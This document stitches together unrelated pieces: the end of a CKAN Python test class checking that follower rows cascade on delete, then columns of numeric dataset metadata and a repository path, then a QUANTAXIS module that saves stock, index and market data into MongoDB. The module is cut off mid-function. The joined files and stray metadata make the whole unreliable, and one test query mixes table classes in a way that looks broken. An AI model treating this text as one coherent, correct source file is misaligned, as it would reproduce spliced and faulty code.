self.joeadmin['id'], self.joeadmin['id'])
self._unfollow_dataset(self.annafan['id'], self.annafan['apikey'],
self.warandpeace['id'], self.warandpeace['id'])
self._unfollow_group(self.annafan['id'], self.annafan['apikey'],
self.davids_group['id'], self.davids_group['id'])
class TestFollowerCascade(object):
'''Tests for on delete cascade of follower table rows.'''
@classmethod
def setup_class(self):
ckan.tests.CreateTestData.create()
self.tester = {
'id': ckan.model.User.get('tester').id,
'apikey': ckan.model.User.get('tester').apikey,
'name': ckan.model.User.get('tester').name,
}
self.testsysadmin = {
'id': ckan.model.User.get('testsysadmin').id,
'apikey': ckan.model.User.get('testsysadmin').apikey,
'name': ckan.model.User.get('testsysadmin').name,
}
self.annafan = {
'id': ckan.model.User.get('annafan').id,
'apikey': ckan.model.User.get('annafan').apikey,
'name': ckan.model.User.get('annafan').name,
}
self.russianfan = {
'id': ckan.model.User.get('russianfan').id,
'apikey': ckan.model.User.get('russianfan').apikey,
'name': ckan.model.User.get('russianfan').name,
}
self.joeadmin = {
'id': ckan.model.User.get('joeadmin').id,
'apikey': ckan.model.User.get('joeadmin').apikey,
'name': ckan.model.User.get('joeadmin').name,
}
self.warandpeace = {
'id': ckan.model.Package.get('warandpeace').id,
'name': ckan.model.Package.get('warandpeace').name,
}
self.annakarenina = {
'id': ckan.model.Package.get('annakarenina').id,
'name': ckan.model.Package.get('annakarenina').name,
}
self.rogers_group = {
'id': ckan.model.Group.get('roger').id,
'name': ckan.model.Group.get('roger').name,
}
self.davids_group = {
'id': ckan.model.Group.get('david').id,
'name': ckan.model.Group.get('david').name,
}
self.app = paste.fixture.TestApp(pylons.test.pylonsapp)
follow_user(self.app, self.joeadmin['id'], self.joeadmin['apikey'],
self.testsysadmin['id'], self.testsysadmin['id'])
follow_user(self.app, self.annafan['id'], self.annafan['apikey'],
self.testsysadmin['id'], self.testsysadmin['id'])
follow_user(self.app, self.russianfan['id'], self.russianfan['apikey'],
self.testsysadmin['id'], self.testsysadmin['id'])
follow_dataset(self.app, self.joeadmin['id'], self.joeadmin['apikey'],
self.annakarenina['id'], self.annakarenina['id'])
follow_dataset(self.app, self.annafan['id'], self.annafan['apikey'],
self.annakarenina['id'], self.annakarenina['id'])
follow_dataset(self.app, self.russianfan['id'], self.russianfan['apikey'],
self.annakarenina['id'], self.annakarenina['id'])
follow_user(self.app, self.tester['id'], self.tester['apikey'],
self.joeadmin['id'], self.joeadmin['id'])
follow_dataset(self.app, self.testsysadmin['id'],
self.testsysadmin['apikey'], self.warandpeace['id'],
self.warandpeace['id'])
follow_group(self.app, self.testsysadmin['id'],
self.testsysadmin['apikey'], self.davids_group['id'],
self.davids_group['id'])
session = ckan.model.Session()
session.delete(ckan.model.User.get('joeadmin'))
session.commit()
session.delete(ckan.model.Package.get('warandpeace'))
session.commit()
session.delete(ckan.model.Group.get('david'))
session.commit()
@classmethod
def teardown_class(self):
ckan.model.repo.rebuild_db()
def test_01_on_delete_cascade_api(self):
'''
Test that UserFollowingUser and UserFollowingDataset rows cascade.
'''
# It should no longer be possible to get joeadmin's follower list.
error = ckan.tests.call_action_api(self.app, 'user_follower_list',
status=409, id='joeadmin')
assert 'id' in error
# It should no longer be possible to get warandpeace's follower list.
error = ckan.tests.call_action_api(self.app, 'dataset_follower_list',
status=409, id='warandpeace')
assert 'id' in error
# It should no longer be possible to get david's follower list.
error = ckan.tests.call_action_api(self.app, 'group_follower_list',
status=409, id='david')
assert 'id' in error
# It should no longer be possible to get joeadmin's follower count.
error = ckan.tests.call_action_api(self.app, 'user_follower_count',
status=409, id='joeadmin')
assert 'id' in error
# It should no longer be possible to get warandpeace's follower count.
error = ckan.tests.call_action_api(self.app, 'dataset_follower_count',
status=409, id='warandpeace')
assert 'id' in error
# It should no longer be possible to get david's follower count.
error = ckan.tests.call_action_api(self.app, 'group_follower_count',
status=409, id='david')
assert 'id' in error
# It should no longer be possible to get am_following for joeadmin.
error = ckan.tests.call_action_api(self.app, 'am_following_user',
apikey=self.testsysadmin['apikey'], status=409, id='joeadmin')
assert 'id' in error
# It should no longer be possible to get am_following for warandpeace.
error = ckan.tests.call_action_api(self.app, 'am_following_dataset',
apikey=self.testsysadmin['apikey'], status=409,
id='warandpeace')
assert 'id' in error
# It should no longer be possible to get am_following for david.
error = ckan.tests.call_action_api(self.app, 'am_following_group',
apikey=self.testsysadmin['apikey'], status=409, id='david')
assert 'id' in error
# It should no longer be possible to unfollow joeadmin.
error = ckan.tests.call_action_api(self.app, 'unfollow_user',
apikey=self.tester['apikey'], status=409, id='joeadmin')
assert error['id'] == ['Not found: User']
# It should no longer be possible to unfollow warandpeace.
error = ckan.tests.call_action_api(self.app, 'unfollow_dataset',
apikey=self.testsysadmin['apikey'], status=409,
id='warandpeace')
assert error['id'] == ['Not found: Dataset']
# It should no longer be possible to unfollow david.
error = ckan.tests.call_action_api(self.app, 'unfollow_group',
apikey=self.testsysadmin['apikey'], status=409, id='david')
assert error['id'] == ['Not found: Group']
# It should no longer be possible to follow joeadmin.
error = ckan.tests.call_action_api(self.app, 'follow_user',
apikey=self.annafan['apikey'], status=409, id='joeadmin')
assert 'id' in error
# It should no longer be possible to follow warandpeace.
error = ckan.tests.call_action_api(self.app, 'follow_dataset',
apikey=self.annafan['apikey'], status=409, id='warandpeace')
assert 'id' in error
# It should no longer be possible to follow david.
error = ckan.tests.call_action_api(self.app, 'follow_group',
apikey=self.annafan['apikey'], status=409, id='david')
assert 'id' in error
# Users who joeadmin was following should no longer have him in their
# follower list.
followers = ckan.tests.call_action_api(self.app, 'user_follower_list',
id=self.testsysadmin['id'])
assert 'joeadmin' not in [follower['name'] for follower in followers]
# Datasets who joeadmin was following should no longer have him in
# their follower list.
followers = ckan.tests.call_action_api(self.app,
'dataset_follower_list', id=self.annakarenina['id'])
assert 'joeadmin' not in [follower['name'] for follower in followers]
def test_02_on_delete_cascade_db(self):
if not are_foreign_keys_supported():
raise SkipTest("Search not supported")
# After the previous test above there should be no rows with joeadmin's
# id in the UserFollowingUser or UserFollowingDataset tables.
from ckan.model import UserFollowingUser, UserFollowingDataset, UserFollowingGroup
session = ckan.model.Session()
query = session.query(UserFollowingUser)
query = query.filter(UserFollowingUser.follower_id==self.joeadmin['id'])
assert query.count() == 0
query = session.query(UserFollowingUser)
query = query.filter(UserFollowingUser.object_id==self.joeadmin['id'])
assert query.count() == 0
query = session.query(UserFollowingDataset)
query = query.filter(UserFollowingUser.follower_id==self.joeadmin['id'])
assert query.count() == 0
# There should be no rows with warandpeace's id in the
# UserFollowingDataset table.
query = session.query(UserFollowingDataset)
query = query.filter(
UserFollowingDataset.object_id==self.warandpeace['id'])
assert query.count() == 0
# There should be no rows with david's id in the
# UserFollowingGroup table.
query = session.query(UserFollowingGroup)
query = query.filter(
UserFollowingGroup.object_id==self.davids_group['id'])
assert query.count() == 0
| 45.167695
| 90
| 0.624422
| 5,574
| 43,903
| 4.738608
| 0.040545
| 0.024533
| 0.050203
| 0.073373
| 0.918714
| 0.899784
| 0.878166
| 0.85068
| 0.807443
| 0.781963
| 0
| 0.010219
| 0.257773
| 43,903
| 971
| 91
| 45.214212
| 0.800344
| 0.157187
| 0
| 0.701201
| 0
| 0
| 0.133821
| 0.010629
| 0
| 0
| 0
| 0
| 0.157658
| 1
| 0.09009
| false
| 0
| 0.010511
| 0
| 0.106607
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
90ed2cb3a84f0857b48f6aac44b96a5b9ab712e1
| 173,547
|
py
|
Python
|
QUANTAXIS/QASU/save_tdx.py
|
yehonghao/QUANTAXIS
|
d977810233607e2bea016450bef6bb080582b498
|
[
"MIT"
] | 1
|
2021-02-19T07:49:31.000Z
|
2021-02-19T07:49:31.000Z
|
QUANTAXIS/QASU/save_tdx.py
|
yehonghao/QUANTAXIS
|
d977810233607e2bea016450bef6bb080582b498
|
[
"MIT"
] | null | null | null |
QUANTAXIS/QASU/save_tdx.py
|
yehonghao/QUANTAXIS
|
d977810233607e2bea016450bef6bb080582b498
|
[
"MIT"
] | 1
|
2021-02-19T07:49:38.000Z
|
2021-02-19T07:49:38.000Z
|
# coding:utf-8
#
# The MIT License (MIT)
#
# Copyright (c) 2016-2019 yutiansut/QUANTAXIS
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import concurrent
import datetime
from concurrent.futures import ProcessPoolExecutor, ThreadPoolExecutor
import json
import pandas as pd
import pymongo
from QUANTAXIS.QAFetch import QA_fetch_get_stock_block
from QUANTAXIS.QAFetch.QATdx import (
QA_fetch_get_option_day,
QA_fetch_get_option_min,
QA_fetch_get_index_day,
QA_fetch_get_index_min,
QA_fetch_get_stock_day,
QA_fetch_get_stock_info,
QA_fetch_get_stock_list,
QA_fetch_get_future_list,
QA_fetch_get_index_list,
QA_fetch_get_future_day,
QA_fetch_get_future_min,
QA_fetch_get_stock_min,
QA_fetch_get_stock_transaction,
QA_fetch_get_stock_xdxr,
select_best_ip
)
from QUANTAXIS.QAFetch.QATdx import (
QA_fetch_get_commodity_option_CU_contract_time_to_market,
QA_fetch_get_commodity_option_SR_contract_time_to_market,
QA_fetch_get_commodity_option_M_contract_time_to_market,
QA_fetch_get_commodity_option_RU_contract_time_to_market,
QA_fetch_get_commodity_option_CF_contract_time_to_market,
QA_fetch_get_commodity_option_C_contract_time_to_market,
QA_fetch_get_option_50etf_contract_time_to_market,
QA_fetch_get_option_all_contract_time_to_market,
)
from QUANTAXIS.QAUtil import (
DATABASE,
QA_util_get_next_day,
QA_util_get_real_date,
QA_util_log_info,
QA_util_to_json_from_pandas,
trade_date_sse
)
from QUANTAXIS.QAUtil import Parallelism
from QUANTAXIS.QAFetch.QATdx import ping, get_ip_list_by_multi_process_ping, stock_ip_list
from multiprocessing import cpu_count
# ip=select_best_ip()
def now_time():
return str(QA_util_get_real_date(str(datetime.date.today() - datetime.timedelta(days=1)), trade_date_sse, -1)) + \
' 17:00:00' if datetime.datetime.now().hour < 15 else str(QA_util_get_real_date(
str(datetime.date.today()), trade_date_sse, -1)) + ' 15:00:00'
def QA_SU_save_single_stock_day(code : str, client= DATABASE, ui_log=None):
'''
save single stock_day
保存单个股票日线数据
:param code: 要保存数据的股票代码
:param client:
:param ui_log: 给GUI qt 界面使用
:param ui_progress: 给GUI qt 界面使用
'''
#stock_list = QA_fetch_get_stock_list().code.unique().tolist()
coll_stock_day = client.stock_day
coll_stock_day.create_index(
[("code",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)]
)
err = []
def __saving_work(code, coll_stock_day):
try:
QA_util_log_info(
'##JOB01 Now Saving STOCK_DAY==== {}'.format(str(code)),
ui_log
)
# 首选查找数据库 是否 有 这个代码的数据
ref = coll_stock_day.find({'code': str(code)[0:6]})
end_date = str(now_time())[0:10]
# 当前数据库已经包含了这个代码的数据, 继续增量更新
# 加入这个判断的原因是因为如果股票是刚上市的 数据库会没有数据 所以会有负索引问题出现
if ref.count() > 0:
# 接着上次获取的日期继续更新
start_date = ref[ref.count() - 1]['date']
QA_util_log_info(
'UPDATE_STOCK_DAY \n Trying updating {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log
)
if start_date != end_date:
coll_stock_day.insert_many(
QA_util_to_json_from_pandas(
QA_fetch_get_stock_day(
str(code),
QA_util_get_next_day(start_date),
end_date,
'00'
)
)
)
# 当前数据库中没有这个代码的股票数据, 从1990-01-01 开始下载所有的数据
else:
start_date = '1990-01-01'
QA_util_log_info(
'UPDATE_STOCK_DAY \n Trying updating {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log
)
if start_date != end_date:
coll_stock_day.insert_many(
QA_util_to_json_from_pandas(
QA_fetch_get_stock_day(
str(code),
start_date,
end_date,
'00'
)
)
)
except Exception as error0:
print(error0)
err.append(str(code))
__saving_work(code, coll_stock_day)
if len(err) < 1:
QA_util_log_info('SUCCESS save stock day ^_^', ui_log)
else:
QA_util_log_info('ERROR CODE \n ', ui_log)
QA_util_log_info(err, ui_log)
def QA_SU_save_stock_day(client=DATABASE, ui_log=None, ui_progress=None):
'''
save stock_day
保存日线数据
:param client:
:param ui_log: 给GUI qt 界面使用
:param ui_progress: 给GUI qt 界面使用
:param ui_progress_int_value: 给GUI qt 界面使用
'''
stock_list = QA_fetch_get_stock_list().code.unique().tolist()
coll_stock_day = client.stock_day
coll_stock_day.create_index(
[("code",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)]
)
err = []
def __saving_work(code, coll_stock_day):
try:
QA_util_log_info(
'##JOB01 Now Saving STOCK_DAY==== {}'.format(str(code)),
ui_log
)
# 首选查找数据库 是否 有 这个代码的数据
ref = coll_stock_day.find({'code': str(code)[0:6]})
end_date = str(now_time())[0:10]
# 当前数据库已经包含了这个代码的数据, 继续增量更新
# 加入这个判断的原因是因为如果股票是刚上市的 数据库会没有数据 所以会有负索引问题出现
if ref.count() > 0:
# 接着上次获取的日期继续更新
start_date = ref[ref.count() - 1]['date']
QA_util_log_info(
'UPDATE_STOCK_DAY \n Trying updating {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log
)
if start_date != end_date:
coll_stock_day.insert_many(
QA_util_to_json_from_pandas(
QA_fetch_get_stock_day(
str(code),
QA_util_get_next_day(start_date),
end_date,
'00'
)
)
)
# 当前数据库中没有这个代码的股票数据, 从1990-01-01 开始下载所有的数据
else:
start_date = '1990-01-01'
QA_util_log_info(
'UPDATE_STOCK_DAY \n Trying updating {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log
)
if start_date != end_date:
coll_stock_day.insert_many(
QA_util_to_json_from_pandas(
QA_fetch_get_stock_day(
str(code),
start_date,
end_date,
'00'
)
)
)
except Exception as error0:
print(error0)
err.append(str(code))
for item in range(len(stock_list)):
QA_util_log_info('The {} of Total {}'.format(item, len(stock_list)))
strProgressToLog = 'DOWNLOAD PROGRESS {} {}'.format(
str(float(item / len(stock_list) * 100))[0:4] + '%',
ui_log
)
intProgressToLog = int(float(item / len(stock_list) * 100))
QA_util_log_info(
strProgressToLog,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intProgressToLog
)
__saving_work(stock_list[item], coll_stock_day)
if len(err) < 1:
QA_util_log_info('SUCCESS save stock day ^_^', ui_log)
else:
QA_util_log_info('ERROR CODE \n ', ui_log)
QA_util_log_info(err, ui_log)
def gen_param(codelist, start_date=None, end_date=None, if_fq='00', frequence='day', IPList=[]):
# 生成QA.QAFetch.QATdx.QQA_fetch_get_stock_day多进程处理的参数
count = len(IPList)
my_iterator = iter(range(len(codelist)))
start_date = str(start_date)[0:10]
end_date = str(end_date)[0:10]
return [(code, start_date, end_date, if_fq, frequence, IPList[i % count]['ip'], IPList[i % count]['port'])
for code, i in [(code, next(my_iterator) % count) for code in codelist]]
def QA_SU_save_stock_week(client=DATABASE, ui_log=None, ui_progress=None):
"""save stock_week
Keyword Arguments:
client {[type]} -- [description] (default: {DATABASE})
"""
stock_list = QA_fetch_get_stock_list().code.unique().tolist()
coll_stock_week = client.stock_week
coll_stock_week.create_index(
[("code",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)]
)
err = []
def __saving_work(code, coll_stock_week):
try:
QA_util_log_info(
'##JOB01 Now Saving STOCK_WEEK==== {}'.format(str(code)),
ui_log=ui_log
)
ref = coll_stock_week.find({'code': str(code)[0:6]})
end_date = str(now_time())[0:10]
if ref.count() > 0:
# 加入这个判断的原因是因为如果股票是刚上市的 数据库会没有数据 所以会有负索引问题出现
start_date = ref[ref.count() - 1]['date']
QA_util_log_info(
'UPDATE_STOCK_WEEK \n Trying updating {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log=ui_log
)
if start_date != end_date:
coll_stock_week.insert_many(
QA_util_to_json_from_pandas(
QA_fetch_get_stock_day(
str(code),
QA_util_get_next_day(start_date),
end_date,
'00',
frequence='week'
)
)
)
else:
start_date = '1990-01-01'
QA_util_log_info(
'UPDATE_STOCK_WEEK \n Trying updating {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log=ui_log
)
if start_date != end_date:
coll_stock_week.insert_many(
QA_util_to_json_from_pandas(
QA_fetch_get_stock_day(
str(code),
start_date,
end_date,
'00',
frequence='week'
)
)
)
except:
err.append(str(code))
for item in range(len(stock_list)):
QA_util_log_info(
'The {} of Total {}'.format(item,
len(stock_list)),
ui_log=ui_log
)
strProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(item / len(stock_list) * 100))[0:4] + '%'
)
intProgress = int(float(item / len(stock_list) * 100))
QA_util_log_info(
strProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intProgress
)
__saving_work(stock_list[item], coll_stock_week)
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_stock_month(client=DATABASE, ui_log=None, ui_progress=None):
"""save stock_month
Keyword Arguments:
client {[type]} -- [description] (default: {DATABASE})
"""
stock_list = QA_fetch_get_stock_list().code.unique().tolist()
coll_stock_month = client.stock_month
coll_stock_month.create_index(
[("code",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)]
)
err = []
def __saving_work(code, coll_stock_month):
try:
QA_util_log_info(
'##JOB01 Now Saving STOCK_MONTH==== {}'.format(str(code)),
ui_log=ui_log
)
ref = coll_stock_month.find({'code': str(code)[0:6]})
end_date = str(now_time())[0:10]
if ref.count() > 0:
# 加入这个判断的原因是因为如果股票是刚上市的 数据库会没有数据 所以会有负索引问题出现
start_date = ref[ref.count() - 1]['date']
QA_util_log_info(
'UPDATE_STOCK_MONTH \n Trying updating {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log=ui_log
)
if start_date != end_date:
coll_stock_month.insert_many(
QA_util_to_json_from_pandas(
QA_fetch_get_stock_day(
str(code),
QA_util_get_next_day(start_date),
end_date,
'00',
frequence='month'
)
)
)
else:
start_date = '1990-01-01'
QA_util_log_info(
'UPDATE_STOCK_MONTH \n Trying updating {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log=ui_log
)
if start_date != end_date:
coll_stock_month.insert_many(
QA_util_to_json_from_pandas(
QA_fetch_get_stock_day(
str(code),
start_date,
end_date,
'00',
frequence='month'
)
)
)
except:
err.append(str(code))
for item in range(len(stock_list)):
QA_util_log_info(
'The {} of Total {}'.format(item,
len(stock_list)),
ui_log=ui_log
)
strProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(item / len(stock_list) * 100))[0:4] + '%'
)
intProgress = int(float(item / len(stock_list) * 100))
QA_util_log_info(
strProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intProgress
)
__saving_work(stock_list[item], coll_stock_month)
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info('ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_stock_year(client=DATABASE, ui_log=None, ui_progress=None):
"""save stock_year
Keyword Arguments:
client {[type]} -- [description] (default: {DATABASE})
"""
stock_list = QA_fetch_get_stock_list().code.unique().tolist()
coll_stock_year = client.stock_year
coll_stock_year.create_index(
[("code",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)]
)
err = []
def __saving_work(code, coll_stock_year):
try:
QA_util_log_info(
'##JOB01 Now Saving STOCK_YEAR==== {}'.format(str(code)),
ui_log=ui_log
)
ref = coll_stock_year.find({'code': str(code)[0:6]})
end_date = str(now_time())[0:10]
if ref.count() > 0:
# 加入这个判断的原因是因为如果股票是刚上市的 数据库会没有数据 所以会有负索引问题出现
start_date = ref[ref.count() - 1]['date']
QA_util_log_info(
'UPDATE_STOCK_YEAR \n Trying updating {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log=ui_log
)
if start_date != end_date:
coll_stock_year.insert_many(
QA_util_to_json_from_pandas(
QA_fetch_get_stock_day(
str(code),
QA_util_get_next_day(start_date),
end_date,
'00',
frequence='year'
)
)
)
else:
start_date = '1990-01-01'
QA_util_log_info(
'UPDATE_STOCK_YEAR \n Trying updating {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log=ui_log
)
if start_date != end_date:
coll_stock_year.insert_many(
QA_util_to_json_from_pandas(
QA_fetch_get_stock_day(
str(code),
start_date,
end_date,
'00',
frequence='year'
)
)
)
except:
err.append(str(code))
for item in range(len(stock_list)):
QA_util_log_info(
'The {} of Total {}'.format(item,
len(stock_list)),
ui_log=ui_log
)
strProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(item / len(stock_list) * 100))[0:4] + '%'
)
intProgress = int(float(item / len(stock_list) * 100))
QA_util_log_info(
strProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intProgress
)
__saving_work(stock_list[item], coll_stock_year)
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_stock_xdxr(client=DATABASE, ui_log=None, ui_progress=None):
"""[summary]
Keyword Arguments:
client {[type]} -- [description] (default: {DATABASE})
"""
stock_list = QA_fetch_get_stock_list().code.unique().tolist()
# client.drop_collection('stock_xdxr')
try:
coll = client.stock_xdxr
coll.create_index(
[('code',
pymongo.ASCENDING),
('date',
pymongo.ASCENDING)],
unique=True
)
except:
client.drop_collection('stock_xdxr')
coll = client.stock_xdxr
coll.create_index(
[('code',
pymongo.ASCENDING),
('date',
pymongo.ASCENDING)],
unique=True
)
err = []
def __saving_work(code, coll):
QA_util_log_info(
'##JOB02 Now Saving XDXR INFO ==== {}'.format(str(code)),
ui_log=ui_log
)
try:
coll.insert_many(
QA_util_to_json_from_pandas(QA_fetch_get_stock_xdxr(str(code))),
ordered=False
)
except:
err.append(str(code))
for i_ in range(len(stock_list)):
QA_util_log_info(
'The {} of Total {}'.format(i_,
len(stock_list)),
ui_log=ui_log
)
strLogInfo = 'DOWNLOAD PROGRESS {} '.format(
str(float(i_ / len(stock_list) * 100))[0:4] + '%'
)
intLogProgress = int(float(i_ / len(stock_list) * 100))
QA_util_log_info(
strLogInfo,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
__saving_work(stock_list[i_], coll)
def QA_SU_save_stock_min(client=DATABASE, ui_log=None, ui_progress=None):
"""save stock_min
Keyword Arguments:
client {[type]} -- [description] (default: {DATABASE})
"""
stock_list = QA_fetch_get_stock_list().code.unique().tolist()
coll = client.stock_min
coll.create_index(
[
('code',
pymongo.ASCENDING),
('time_stamp',
pymongo.ASCENDING),
('date_stamp',
pymongo.ASCENDING)
]
)
err = []
def __saving_work(code, coll):
QA_util_log_info(
'##JOB03 Now Saving STOCK_MIN ==== {}'.format(str(code)),
ui_log=ui_log
)
try:
for type in ['1min', '5min', '15min', '30min', '60min']:
ref_ = coll.find({'code': str(code)[0:6], 'type': type})
end_time = str(now_time())[0:19]
if ref_.count() > 0:
start_time = ref_[ref_.count() - 1]['datetime']
QA_util_log_info(
'##JOB03.{} Now Saving {} from {} to {} =={} '.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_stock_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
coll.insert_many(
QA_util_to_json_from_pandas(__data)[1::]
)
else:
start_time = '2015-01-01'
QA_util_log_info(
'##JOB03.{} Now Saving {} from {} to {} =={} '.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_stock_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
coll.insert_many(
QA_util_to_json_from_pandas(__data)
)
except Exception as e:
QA_util_log_info(e, ui_log=ui_log)
err.append(code)
QA_util_log_info(err, ui_log=ui_log)
executor = ThreadPoolExecutor(max_workers=4)
# executor.map((__saving_work, stock_list[i_], coll),URLS)
res = {
executor.submit(__saving_work,
stock_list[i_],
coll)
for i_ in range(len(stock_list))
}
count = 0
for i_ in concurrent.futures.as_completed(res):
QA_util_log_info(
'The {} of Total {}'.format(count,
len(stock_list)),
ui_log=ui_log
)
strProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(count / len(stock_list) * 100))[0:4] + '%'
)
intProgress = int(count / len(stock_list) * 10000.0)
QA_util_log_info(
strProgress,
ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intProgress
)
count = count + 1
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_single_stock_min(code : str, client=DATABASE, ui_log=None, ui_progress=None):
"""save single stock_min
Keyword Arguments:
client {[type]} -- [description] (default: {DATABASE})
"""
#stock_list = QA_fetch_get_stock_list().code.unique().tolist()
stock_list = [code]
coll = client.stock_min
coll.create_index(
[
('code',
pymongo.ASCENDING),
('time_stamp',
pymongo.ASCENDING),
('date_stamp',
pymongo.ASCENDING)
]
)
err = []
def __saving_work(code, coll):
QA_util_log_info(
'##JOB03 Now Saving STOCK_MIN ==== {}'.format(str(code)),
ui_log=ui_log
)
try:
for type in ['1min', '5min', '15min', '30min', '60min']:
ref_ = coll.find({'code': str(code)[0:6], 'type': type})
end_time = str(now_time())[0:19]
if ref_.count() > 0:
start_time = ref_[ref_.count() - 1]['datetime']
QA_util_log_info(
'##JOB03.{} Now Saving {} from {} to {} =={} '.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_stock_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
coll.insert_many(
QA_util_to_json_from_pandas(__data)[1::]
)
else:
start_time = '2015-01-01'
QA_util_log_info(
'##JOB03.{} Now Saving {} from {} to {} =={} '.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_stock_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
coll.insert_many(
QA_util_to_json_from_pandas(__data)
)
except Exception as e:
QA_util_log_info(e, ui_log=ui_log)
err.append(code)
QA_util_log_info(err, ui_log=ui_log)
executor = ThreadPoolExecutor(max_workers=4)
# executor.map((__saving_work, stock_list[i_], coll),URLS)
res = {
executor.submit(__saving_work,
stock_list[i_],
coll)
for i_ in range(len(stock_list))
}
count = 1
for i_ in concurrent.futures.as_completed(res):
QA_util_log_info(
'The {} of Total {}'.format(count,
len(stock_list)),
ui_log=ui_log
)
strProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(count / len(stock_list) * 100))[0:4] + '%'
)
intProgress = int(count / len(stock_list) * 10000.0)
QA_util_log_info(
strProgress,
ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intProgress
)
count = count + 1
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_single_index_day(code : str, client=DATABASE, ui_log=None):
"""save index_day
Keyword Arguments:
code : single index code
client {[type]} -- [description] (default: {DATABASE})
"""
#__index_list = QA_fetch_get_stock_list('index')
coll = client.index_day
coll.create_index(
[('code',
pymongo.ASCENDING),
('date_stamp',
pymongo.ASCENDING)]
)
err = []
def __saving_work(code, coll):
try:
ref_ = coll.find({'code': str(code)[0:6]})
end_time = str(now_time())[0:10]
if ref_.count() > 0:
start_time = ref_[ref_.count() - 1]['date']
QA_util_log_info(
'##JOB04 Now Saving INDEX_DAY==== \n Trying updating {} from {} to {}'
.format(code,
start_time,
end_time),
ui_log=ui_log
)
if start_time != end_time:
coll.insert_many(
QA_util_to_json_from_pandas(
QA_fetch_get_index_day(
str(code),
QA_util_get_next_day(start_time),
end_time
)
)
)
else:
try:
start_time = '1990-01-01'
QA_util_log_info(
'##JOB04 Now Saving INDEX_DAY==== \n Trying updating {} from {} to {}'
.format(code,
start_time,
end_time),
ui_log=ui_log
)
coll.insert_many(
QA_util_to_json_from_pandas(
QA_fetch_get_index_day(
str(code),
start_time,
end_time
)
)
)
except:
start_time = '2009-01-01'
QA_util_log_info(
'##JOB04 Now Saving INDEX_DAY==== \n Trying updating {} from {} to {}'
.format(code,
start_time,
